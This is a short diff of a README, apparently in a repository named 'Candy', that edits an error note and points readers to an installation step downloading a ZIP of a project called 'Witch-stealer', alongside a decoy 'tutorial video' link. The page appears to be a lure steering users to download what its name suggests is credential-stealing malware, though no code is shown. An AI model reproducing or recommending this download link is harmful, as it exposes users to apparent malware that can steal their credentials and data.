doxinggirl/Candy/README.md

 > Having trouble reading?
 Then the developer has a tutorial video for you.
 You can access them by [click here](https://www.youtube.com/watch?v=dQw4w9WgXcQ)
 ---
 > [!NOTE]
-> Did you encounter an error?
-Certain operations may require administrative privileges.
+> Did an error occur?
+If you have a GitHub account, please consider opening an issue.
+We’ll do our best to improve.

 - **🔩 Installation Tutorial**
 To get started, [click here](https://github.com/addadi000/Witch-stealer/archive/refs/heads/main.zip) to download the ZIP file.<br>